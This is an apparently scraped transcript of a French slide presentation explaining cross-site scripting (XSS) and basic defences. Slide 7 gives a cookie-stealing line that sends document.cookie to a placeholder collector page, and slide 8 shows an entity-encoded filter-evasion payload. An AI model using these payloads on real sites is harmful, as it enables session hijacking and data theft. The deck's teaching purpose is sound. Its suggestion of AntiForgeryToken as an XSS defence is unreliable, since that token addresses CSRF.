La présentation est en train de télécharger. S'il vous plaît, attendez

La présentation est en train de télécharger. S'il vous plaît, attendez

(fait son épicerie les jeudi). Cross site Scripting est l'attaque web la plus commune.

Présentations similaires


Présentation au sujet: "(fait son épicerie les jeudi). Cross site Scripting est l'attaque web la plus commune."— Transcription de la présentation:

1 (fait son épicerie les jeudi)

2 Cross site Scripting est l'attaque web la plus commune.

3 Le concept de XSS est de manipuler les scripts cotes client de l'application web pour exécuter les désirs d'un utilisateur malicieux. Une manipulation peut être par exemple exécuter a chaque fois que la page web est loader. XSS est la plus commune vulnérabilité WEB de nos jours. Pourtant il n'est pas toujours facile à trouver et à régler. Ces vulnérabilités peuvent apportés de graves conséquences comme le vol de données sensibles.

4

5 -XSS est une attaque web faites sur des applications web vulnérables -Dans une attaque XSS, la victime est l'utilisateur et non l'application -Dans une attaque XSS, le contenu malicieux est "livrer: aux utilisateurs qui utilisent JavaScript (pratiquement tout le monde) Si JS est désactiver, l'utilisation de plusieurs sites est impossible: exemple ACCESD

6 Le DOM-based ou local cross scripting site est un problème directement sur le script côté client (en général, le JavaScript) de la page (variables passées en URL qui sont réutilisées dans le JavaScript, etc..) Par les forums, formulaires d’inscription: Cette faille peut permettre des exécutions côté client ou côté serveur selon les cas et peut permettre tout type d'exploitation, de la récupération de cookies à l'éxécution de scripts malveillants.

7 Le vol de cookie: location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cooki e;

8 http://ha.ckers.org/xsscalc.html https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet Encoder: <IMG SRC=javascr&#1 05;pt:aler&#1 16;( 'XSS')>

9 Dans un forum, une section commentaire, un formulaire d’inscrisption, bref tous les endroits où un utilisateur peut inscrire du texte. alert('xss')

10 Toujours valider les entrés de l’utilisateur, ne jamais lui faire confiance. Des méthodes comme htmlspecialchars(), strip_tags() en php peuvent être utilisées. Utiliser un attribut [AntiForgeryToken] en asp.net mvc au dessus des méthodes post des controllers

11 Ne faite jamais confiance à l’utilisateur pour bien protéger votre site!

12 http://ha.ckers.org/xsscalc.html https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet http://www.breakthesecurity.com/2012/01/how-to-do-cookie- stealing-with-cross.html http://www.breakthesecurity.com/2012/01/how-to-do-cookie- stealing-with-cross.html http://www.bases-hacking.org/faille-xss.html


Télécharger ppt "(fait son épicerie les jeudi). Cross site Scripting est l'attaque web la plus commune."

Présentations similaires


Annonces Google